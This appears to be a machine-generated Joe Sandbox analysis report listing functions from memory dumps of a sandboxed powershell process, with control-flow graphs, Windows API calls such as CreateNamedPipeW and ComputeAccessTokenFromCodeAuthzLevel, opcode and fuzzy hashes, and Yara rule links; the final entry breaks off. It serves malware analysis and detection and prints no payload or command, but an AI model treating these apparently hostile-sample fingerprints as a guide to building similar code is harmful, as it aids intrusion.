
                                              Uniqueness Score: -1.00%

                                              Function 0835A678 Relevance: .4, Instructions: 432COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8350000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: da12d4e2d1f92c7b55666fdc9150b180a92b2a2773e72f5f671c800aedc3e3a4
                                              • Instruction ID: 2efe00080df571b8a4a0735b1b4e5bb6279dbf41e7cef7038a3f480f07a99081
                                              • Opcode Fuzzy Hash: da12d4e2d1f92c7b55666fdc9150b180a92b2a2773e72f5f671c800aedc3e3a4
                                              • Instruction Fuzzy Hash: 4B124C70A00395DFDB11DB68C890B8DFBF2AF85300F148599D949AF352DB71AE85CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0835BF90 Relevance: .4, Instructions: 367COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8350000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 984c260bce8efd518e5510a422eed0f6547ddc43de3f57b4a87ab51a2d5c11b7
                                              • Instruction ID: 5b2cec42b5756cde1c4efa486ef9d3fba462038c9e4e7600b7f4b3df481b0cc8
                                              • Opcode Fuzzy Hash: 984c260bce8efd518e5510a422eed0f6547ddc43de3f57b4a87ab51a2d5c11b7
                                              • Instruction Fuzzy Hash: 43E19030A00719DFEB15DBA4DC50BAEB776EF85304F1081A9E9097B391DB75AD81CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083A55E1 Relevance: .2, Instructions: 215COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091827359.00000000083A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083A0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83a0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d1d4aa2b36136e702916c0ee209e733894dd5bc63fab27d312d55be410bb0e94
                                              • Instruction ID: 274392ec4ec9d38ddb330573095090aa681adbc57361dbc46601d9ae741ca332
                                              • Opcode Fuzzy Hash: d1d4aa2b36136e702916c0ee209e733894dd5bc63fab27d312d55be410bb0e94
                                              • Instruction Fuzzy Hash: 1C910634A00204CFDB14DFA8C584A9DBBF6FF89305F2581A9E805AB362DB71EC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08356CA0 Relevance: .2, Instructions: 210COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8350000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d30af545c3c1c28585498fc771f9dca7a8b3fe3691beabd4e1d2a7f61a921ef2
                                              • Instruction ID: 80bf00443caa567c315e100adaf523d1962c99fb92195847795a6476e5554c6a
                                              • Opcode Fuzzy Hash: d30af545c3c1c28585498fc771f9dca7a8b3fe3691beabd4e1d2a7f61a921ef2
                                              • Instruction Fuzzy Hash: AA814C70A00215EFDB11CB64DC81F9EBBB6FF88711F118158E905AB395DBB1AC82CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08891658 Relevance: 2.4, Strings: 1, Instructions: 1188COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 8Fq
                                              • API String ID: 0-3090149526
                                              • Opcode ID: 9101efafa2064c966611c5e17ac55096fb83d030887e6ddd5f00b78960e4861a
                                              • Instruction ID: 26798e6a02b686b3edf0adf10da11744feb4e2c352216803ca21fca852358534
                                              • Opcode Fuzzy Hash: 9101efafa2064c966611c5e17ac55096fb83d030887e6ddd5f00b78960e4861a
                                              • Instruction Fuzzy Hash: 68A2BF34B04249DFDB15CF68C844AAAB7F2AF85316F18C0AAD895DB751CB35DC42CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 089E5660 Relevance: 1.9, Strings: 1, Instructions: 609COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 773 89e5660-89e56a0 776 89e571c-89e5740 773->776 777 89e56a2-89e56c5 773->777 782 89e5754-89e5756 776->782 783 89e5742-89e574b 776->783 954 89e56c8 call 89e4850 777->954 955 89e56c8 call 89e4860 777->955 785 89e5758-89e5762 782->785 786 89e5764 782->786 783->782 784 89e56cb-89e5714 784->776 787 89e5769-89e576b 785->787 786->787 788 89e576d-89e5791 787->788 789 89e57c4-89e57df 787->789 797 89e5b19-89e5b2b 788->797 798 89e57f1-89e57f3 789->798 799 89e57e1-89e57ef 789->799 807 89e5d5d-89e5d67 797->807 808 89e5b31-89e5b35 797->808 801 89e57f5-89e57ff 798->801 802 89e5801-89e5821 798->802 799->798 801->802 809 89e5826-89e583c 801->809 813 89e5923-89e592a 802->813 815 89e5d6d-89e5dbc 807->815 816 89e5ee3-89e5eea 807->816 808->807 810 89e5b3b-89e5ba0 808->810 825 89e5842-89e588b 809->825 826 89e58f3-89e5915 809->826 850 89e5c07-89e5c0e 810->850 851 89e5ba2-89e5bbc 810->851 818 89e592c-89e593c 813->818 819 89e5947 813->819 842 89e5e44-89e5e4f 815->842 843 89e5dc2-89e5ddc 815->843 823 89e594d-89e59f1 818->823 819->823 928 89e5af9-89e5b12 823->928 929 89e59f7-89e5a36 823->929 857 89e588d-89e58a0 825->857 858 89e58a2-89e58d1 825->858 831 89e5917 826->831 832 89e5920-89e5921 826->832 831->832 832->813 855 89e5ea9-89e5eb8 842->855 856 89e5e51-89e5e73 842->856 867 89e5dde-89e5e1b 843->867 868 89e5e1d-89e5e36 843->868 852 89e5c4b-89e5c56 850->852 853 89e5c10-89e5c27 850->853 885 89e5bbe-89e5bde 851->885 886 89e5be0-89e5bf9 851->886 874 89e5cad-89e5cb9 852->874 875 89e5c58-89e5c77 852->875 853->852 887 89e5c29-89e5c43 853->887 859 89e5ec0-89e5ec4 855->859 953 89e5eba call 89ed2f4 855->953 891 89e5e88-89e5e9e 856->891 892 89e5e75-89e5e80 856->892 861 89e58d8-89e58ed 857->861 858->861 859->816 863 89e5ec6-89e5eda 859->863 861->825 861->826 863->816 867->868 879 89e5e38 868->879 880 89e5e41 868->880 878 89e5cc1-89e5cc5 874->878 910 89e5c8c-89e5c9f 875->910 911 89e5c79-89e5c84 875->911 878->816 893 89e5ccb-89e5cd2 878->893 879->880 880->842 885->886 897 89e5bfb 886->897 898 89e5c04-89e5c05 886->898 887->852 891->859 892->891 899 89e5d3b-89e5d51 893->899 900 89e5cd4-89e5ce6 893->900 897->898 898->850 904 89e5ced-89e5d2e 900->904 905 89e5ce8 900->905 926 89e5d38-89e5d39 904->926 927 89e5d30 904->927 905->904 910->878 911->910 926->899 927->926 928->797 934 89e5a38-89e5a43 929->934 935 89e5a47-89e5aa6 929->935 934->935 944 89e5aa8 935->944 945 89e5ab2-89e5ac6 935->945 944->797 946 89e5aaa-89e5ab0 944->946 945->797 948 89e5ac8-89e5af7 945->948 946->797 946->945 948->797 953->859 954->784 955->784
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2093292229.00000000089E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 089E0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_89e0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: |S(q
                                              • API String ID: 0-336117713
                                              • Opcode ID: 5de10c3e166957498383dcdd0bfbe3aab875b788dfd073e29da9f6eafe9b9d52
                                              • Instruction ID: 95057b4506e29c590cf4fedd9bb3ee0d3664060d1f0470c43490806c3e1f6c2d
                                              • Opcode Fuzzy Hash: 5de10c3e166957498383dcdd0bfbe3aab875b788dfd073e29da9f6eafe9b9d52
                                              • Instruction Fuzzy Hash: F8420734A00218CFDB15EF64D958BADBBB6FF88319F15846DE8069B3A1DB75AC41CB40
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 050BD408 Relevance: 1.7, APIs: 1, Instructions: 221COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 956 50bd408-50bd456 959 50bd458-50bd45b 956->959 960 50bd45e-50bd47e call 50bcbbc 956->960 959->960 963 50bd574-50bd67e 960->963 964 50bd484-50bd49d call 50bcbc8 960->964 992 50bd68f-50bd6dd IdentifyCodeAuthzLevelW 963->992 993 50bd680-50bd68c 963->993 968 50bd49f-50bd4a9 964->968 969 50bd4ce-50bd4d3 964->969 977 50bd4ab-50bd4b0 968->977 978 50bd4b2-50bd4cc 968->978 971 50bd4f1-50bd513 call 50bcbd4 969->971 972 50bd4d5-50bd4ef 969->972 974 50bd543-50bd546 call 50bcbe0 971->974 972->974 982 50bd54b 974->982 977->978 981 50bd515-50bd53c 977->981 978->974 981->974 982->963 994 50bd6df-50bd6e5 992->994 995 50bd6e6-50bd72f 992->995 993->992 994->995 999 50bd741-50bd748 995->999 1000 50bd731-50bd737 995->1000 1001 50bd74a-50bd759 999->1001 1002 50bd75f 999->1002 1000->999 1001->1002 1004 50bd760 1002->1004 1004->1004
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9d2118dad3c6b7557157389ec33a5c79ee090a0df73607cd6f050ede2d05cfe0
                                              • Instruction ID: 48bb3d564d1d0e1e7b2ea1fbe84ec9435a87632bf4bdd3d54311cea4067343ac
                                              • Opcode Fuzzy Hash: 9d2118dad3c6b7557157389ec33a5c79ee090a0df73607cd6f050ede2d05cfe0
                                              • Instruction Fuzzy Hash: 88916A719003598FEB24DFA5C884BEDBBF5BF48304F1084AAD409AB250DBB59E85CF91
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08359AAC Relevance: 1.6, APIs: 1, Instructions: 126pipeCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1926 8359aac-8359b22 1928 8359b24-8359b2a 1926->1928 1929 8359b2d-8359b36 1926->1929 1928->1929 1930 8359b55-8359b59 1929->1930 1931 8359b38-8359b54 1929->1931 1932 8359b5b-8359b72 1930->1932 1933 8359b7a-8359be8 CreateNamedPipeW 1930->1933 1931->1930 1932->1933 1935 8359bf1-8359c2f 1933->1935 1936 8359bea-8359bf0 1933->1936 1940 8359c44-8359c48 1935->1940 1941 8359c31-8359c35 1935->1941 1936->1935 1943 8359c59 1940->1943 1944 8359c4a-8359c56 1940->1944 1941->1940 1942 8359c37-8359c3a 1941->1942 1942->1940 1945 8359c5a 1943->1945 1944->1943 1945->1945
                                              APIs
                                              • CreateNamedPipeW.KERNELBASE(00000000,40080003,?,?,?,00000000,00000001,00000000), ref: 08359BD8
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2091688582.0000000008350000.00000040.00000800.00020000.00000000.sdmp, Offset: 08350000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8350000_powershell.jbxd
                                              Similarity
                                              • API ID: CreateNamedPipe
                                              • String ID:
                                              • API String ID: 2489174969-0
                                              • Opcode ID: 93ef21f051171d7aa107d7cee70a44a641a9b7f16ae4e862825c73a976a94611
                                              • Instruction ID: 4e586de8c165b30513465095cb652cc480119f6aba8f47c185cf88e46dfbfcc0
                                              • Opcode Fuzzy Hash: 93ef21f051171d7aa107d7cee70a44a641a9b7f16ae4e862825c73a976a94611
                                              • Instruction Fuzzy Hash: 305108B1D01348DFDB15CFA9D984B8DBFF2AF88305F24812AE818AB260D7749984CF50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 050BD5AC Relevance: 1.6, APIs: 1, Instructions: 112COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1947 50bd5ac-50bd67e 1951 50bd68f-50bd6dd IdentifyCodeAuthzLevelW 1947->1951 1952 50bd680-50bd68c 1947->1952 1953 50bd6df-50bd6e5 1951->1953 1954 50bd6e6-50bd72f 1951->1954 1952->1951 1953->1954 1958 50bd741-50bd748 1954->1958 1959 50bd731-50bd737 1954->1959 1960 50bd74a-50bd759 1958->1960 1961 50bd75f 1958->1961 1959->1958 1960->1961 1963 50bd760 1961->1963 1963->1963
                                              APIs
                                              • IdentifyCodeAuthzLevelW.ADVAPI32(00000001,?,?,00000000), ref: 050BD6CA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: AuthzCodeIdentifyLevel
                                              • String ID:
                                              • API String ID: 1431151113-0
                                              • Opcode ID: e451cdcd8a0c2db89ae8ab02336a5c0cff64893f0bb433bfd2408a4cf7132198
                                              • Instruction ID: a32c893f80d81ec929b15a18395eae9ef59531c1c8424bc392494fb81791acf5
                                              • Opcode Fuzzy Hash: e451cdcd8a0c2db89ae8ab02336a5c0cff64893f0bb433bfd2408a4cf7132198
                                              • Instruction Fuzzy Hash: B441E471801269DFEB64CF59C985BDDBBF5BB08304F1085EAD40DAB250D7B59A88CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 050BCBBC Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1964 50bcbbc-50bd67e 1968 50bd68f-50bd6dd IdentifyCodeAuthzLevelW 1964->1968 1969 50bd680-50bd68c 1964->1969 1970 50bd6df-50bd6e5 1968->1970 1971 50bd6e6-50bd72f 1968->1971 1969->1968 1970->1971 1975 50bd741-50bd748 1971->1975 1976 50bd731-50bd737 1971->1976 1977 50bd74a-50bd759 1975->1977 1978 50bd75f 1975->1978 1976->1975 1977->1978 1980 50bd760 1978->1980 1980->1980
                                              APIs
                                              • IdentifyCodeAuthzLevelW.ADVAPI32(00000001,?,?,00000000), ref: 050BD6CA
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: AuthzCodeIdentifyLevel
                                              • String ID:
                                              • API String ID: 1431151113-0
                                              • Opcode ID: 93fc3c19783b18eb40dd99601851742c4c09d8c029a2a84eef795cf9b3258ec2
                                              • Instruction ID: 2869e5dda8c22acaba8d53a3f23a5a63efbda0c20cfe3e4fd67619cf6acc75a8
                                              • Opcode Fuzzy Hash: 93fc3c19783b18eb40dd99601851742c4c09d8c029a2a84eef795cf9b3258ec2
                                              • Instruction Fuzzy Hash: 3B41E671801269DFEB64CF59C984BDDBBF5AB08304F1084EAD50DB7250D7B59A84CFA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 050BCBC8 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2082 50bcbc8-50bf423 ComputeAccessTokenFromCodeAuthzLevel 2085 50bf42c-50bf454 2082->2085 2086 50bf425-50bf42b 2082->2086 2086->2085
                                              APIs
                                              • ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,00000000,?,?,?), ref: 050BF416
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: AccessAuthzCodeComputeFromLevelToken
                                              • String ID:
                                              • API String ID: 132034935-0
                                              • Opcode ID: 53cde5b3f2773ce95306a93916f4557f587c5efa5957c6bd4a1fa335afd7d27a
                                              • Instruction ID: 6dc40d02692688484cae769fa68b7676bb3ad08a0972085b3560fcd55cc9584a
                                              • Opcode Fuzzy Hash: 53cde5b3f2773ce95306a93916f4557f587c5efa5957c6bd4a1fa335afd7d27a
                                              • Instruction Fuzzy Hash: ED2129B1800349DFDB10DF9AD884BDEBBF4FB48320F118429E918A7250D774A950CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 050BF399 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2089 50bf399-50bf3e0 2090 50bf3e8-50bf423 ComputeAccessTokenFromCodeAuthzLevel 2089->2090 2091 50bf42c-50bf454 2090->2091 2092 50bf425-50bf42b 2090->2092 2092->2091
                                              APIs
                                              • ComputeAccessTokenFromCodeAuthzLevel.ADVAPI32(?,00000000,?,?,?), ref: 050BF416
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: AccessAuthzCodeComputeFromLevelToken
                                              • String ID:
                                              • API String ID: 132034935-0
                                              • Opcode ID: 118d06c67b3685ab165b49ca45c10cbfaf36bec105a3ff3c036b34a48893b20d
                                              • Instruction ID: 66058f8d68fe278e97d47967361ca4aa0f186d428418158789bee3a675d0b341
                                              • Opcode Fuzzy Hash: 118d06c67b3685ab165b49ca45c10cbfaf36bec105a3ff3c036b34a48893b20d
                                              • Instruction Fuzzy Hash: D52118768003499FDB10CFAAD884BDEBFF0EF48320F148429E568A7650C3789555CF61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 050B6BE8 Relevance: 1.6, APIs: 1, Instructions: 59COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 2095 50b6be8-50b6c3a 2098 50b6c3c-50b6c3f 2095->2098 2099 50b6c42-50b6c6d GetFileAttributesW 2095->2099 2098->2099 2100 50b6c6f-50b6c75 2099->2100 2101 50b6c76-50b6c93 2099->2101 2100->2101
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 050B6C60
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 0846a0206ec227d79e87491bf75fb495d6bf36b33e6f607fae063e9c44d5b0e5
                                              • Instruction ID: 2027079b4f67e548bdf6cdf247c1c375a91899434ae15e9fe98af17f4bfa8740
                                              • Opcode Fuzzy Hash: 0846a0206ec227d79e87491bf75fb495d6bf36b33e6f607fae063e9c44d5b0e5
                                              • Instruction Fuzzy Hash: 3C214AB1D142599BDB10DFAAD445BEEFBF4FB48320F10812AD418B7240C775A940CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 050B552C Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(00000000), ref: 050B6C60
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: ca58e71b254416822fecc3fa0222fae1b076682c0bf28620eda343b5ec45418b
                                              • Instruction ID: 9f69017f9fcd7ea2b651a6185450ed4e17b9ca357c04e8c3e22a675cb6c703db
                                              • Opcode Fuzzy Hash: ca58e71b254416822fecc3fa0222fae1b076682c0bf28620eda343b5ec45418b
                                              • Instruction Fuzzy Hash: 122136B1D046599BDB10CF9AD844BEEFBF4FB48320F10812AD819B7650C7B4A940CFA4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 050BF7D0 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2083920231.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_50b0000_powershell.jbxd
                                              Similarity
                                              • API ID: InfoSystem
                                              • String ID:
                                              • API String ID: 31276548-0
                                              • Opcode ID: 093f572ae0cd9e2a427fb62b4c6a8fbc346c19f0d926ea84d1493aee35778717
                                              • Instruction ID: de2ef93c539b52f2ef044354daaf699a740a8aa39c32f1e80d8731f9e5169c02
                                              • Opcode Fuzzy Hash: 093f572ae0cd9e2a427fb62b4c6a8fbc346c19f0d926ea84d1493aee35778717
                                              • Instruction Fuzzy Hash: 1011E3B1C0065A9BDB00CF9AD984BDEFBB4FB48314F14812AD418B7250D3B4A655CFA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 083F0040 Relevance: .7, Instructions: 684COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092136377.00000000083F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 083F0000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_83f0000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: cf8ef4ac7cb9242b353a1700947546098f186649e0d08c225c73b0c0230e7bb4
                                              • Instruction ID: 874958c02920c7e471130b41c79b98b1b3ed00b3f226b83cae891a63bfde8bbb
                                              • Opcode Fuzzy Hash: cf8ef4ac7cb9242b353a1700947546098f186649e0d08c225c73b0c0230e7bb4
                                              • Instruction Fuzzy Hash: CB52ED38A00348EFEB06DBA0E854BDD7BB7EB98310F148025E90677795CB35A891DF25
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08895308 Relevance: .7, Instructions: 680COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fc1ef6d0d821a1fad09bd2eb7045d98360723b7ac55eb8feac54d42d99a3046d
                                              • Instruction ID: 09ea8bb971bd9f2d95f32008ccbbe85a32ff5324387ba2eb7067d274153d70f5
                                              • Opcode Fuzzy Hash: fc1ef6d0d821a1fad09bd2eb7045d98360723b7ac55eb8feac54d42d99a3046d
                                              • Instruction Fuzzy Hash: 8A528A74B01208DFDB15CF98D880A6EB7B2EF84316F19C159E949AB752CB76EC42CB50
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08894388 Relevance: .6, Instructions: 650COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 75bab6c0bede5d115a53a93d31b20c417aff53205fcd9eeeaf62c6571fd112b7
                                              • Instruction ID: 717f933d02ee0efdc5de7c4f1be99f455ee855ed1bddb4685f3971aa3e972b28
                                              • Opcode Fuzzy Hash: 75bab6c0bede5d115a53a93d31b20c417aff53205fcd9eeeaf62c6571fd112b7
                                              • Instruction Fuzzy Hash: F2424D74B00318CFEB24DB58C850B6AB7B2EB94306F15C199D949AB752CB76EC42CF94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08893998 Relevance: .6, Instructions: 643COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ec631c12aa281700427d6296cd2ea0db2a205d3cc9f20c42e270a3b2a83f9fbe
                                              • Instruction ID: 0d19a1b05142e6c304e55ea106ed8ecd0a3d207614438661932c87b4a6377741
                                              • Opcode Fuzzy Hash: ec631c12aa281700427d6296cd2ea0db2a205d3cc9f20c42e270a3b2a83f9fbe
                                              • Instruction Fuzzy Hash: 8C32B030B003089FDB14DB68D854BAEBBA2AFC4316F19C059E585EB791CB75DC42CBA5
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08890778 Relevance: .6, Instructions: 599COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 48b3d59f1afac4430609f784c0172a649d4def4412d8d85e6dee7f1616e31d7c
                                              • Instruction ID: 1e6955c7de4739e309a95e399763d3beec57fffe6739906442875fcf9833b836
                                              • Opcode Fuzzy Hash: 48b3d59f1afac4430609f784c0172a649d4def4412d8d85e6dee7f1616e31d7c
                                              • Instruction Fuzzy Hash: 00123A31704744CFDF259BA9D84066ABBE6AFC1226F1CC07ED586DB642CA35DC42CBA1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08894CB4 Relevance: .6, Instructions: 589COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0e1d92006ee8c2819bd82b7d586212f19f376788e7ef83218ccee2ac619ba4a1
                                              • Instruction ID: 7d1a66a5a8dfabcbdceae1114ac84b9676932929d3c4e174e226e55c1fc1880c
                                              • Opcode Fuzzy Hash: 0e1d92006ee8c2819bd82b7d586212f19f376788e7ef83218ccee2ac619ba4a1
                                              • Instruction Fuzzy Hash: 89324D74B00314CFEB20DB58C990B6AB7B2EB94306F15C199D949AB792CB76EC42CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 08894366 Relevance: .6, Instructions: 583COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 6d0deebd6555930a872de8620c1c555062dd06ed629b226aa125ede259471c47
                                              • Instruction ID: ef5a614f5f424e5e5a5c4135fca55bbd984e5082e3039dcd13049e467bdcbae5
                                              • Opcode Fuzzy Hash: 6d0deebd6555930a872de8620c1c555062dd06ed629b226aa125ede259471c47
                                              • Instruction Fuzzy Hash: 13324B74B00214CFEB20CB58C990B6ABBB2FB84316F15C199D949AB752CB76EC42CF54
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0889D1EE Relevance: .6, Instructions: 559COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.2092474913.0000000008890000.00000040.00000800.00020000.00000000.sdmp, Offset: 08890000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_8890000_powershell.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7e9f6914ae1823ada131504a29be79224e36223af4d6ab5882413f7698e1e798
                                              • Instruction ID: c8762370b936b9bd9b57ca1e159ed051843cee28d93adaf107b70e4bfe05db00
